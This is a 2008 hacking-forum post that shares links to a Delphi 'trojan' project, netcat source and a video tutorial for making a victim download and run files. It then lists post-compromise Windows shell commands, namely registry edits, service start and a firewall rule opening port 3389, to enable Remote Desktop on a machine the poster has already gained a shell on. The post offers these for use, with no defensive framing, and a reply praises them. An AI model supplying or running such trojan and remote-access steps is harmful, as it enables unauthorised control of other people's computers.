PLA Forums
Other Stuff That Has Little To Do With PLA => Techinical Shit => Phreaking, Hacking, Social Engineering, Lock Picking => Topic started by: tully on October 14, 2008, 09:38:25 PM
-
I made a simple video tutorial covering downloading and executing files of your choice in delphi, here are the links for the files
———————
the rar which contains the project files
http://tully.projm.org/delphi/delphitrojan.rar
———————
the windows netcat source
http://tully.projm.org/delphi/nc.zip
———————
and the tutorial on how to do everything
http://tully.projm.org/delphi/delphitrojan.swf
——————-
how to enable rdp via shell, once u get teh connection enter these commands
reg add “hklm\system\currentControlSet\Control\Terminal Server†/v “AllowTSConnections†/t REG_DWORD /d 0×1 /f
————
reg add “hklm\system\currentControlSet\Control\Terminal Server†/v “fDenyTSConnections†/t REG_DWORD /d 0×0 /f
———–
sc config TermService start= auto
———–
net start Termservice
———-
netsh.exe
———-
firewall
———-
add portopening TCP 3389 “Remote Desktopâ€
———
enjoy
-
whoa. nice.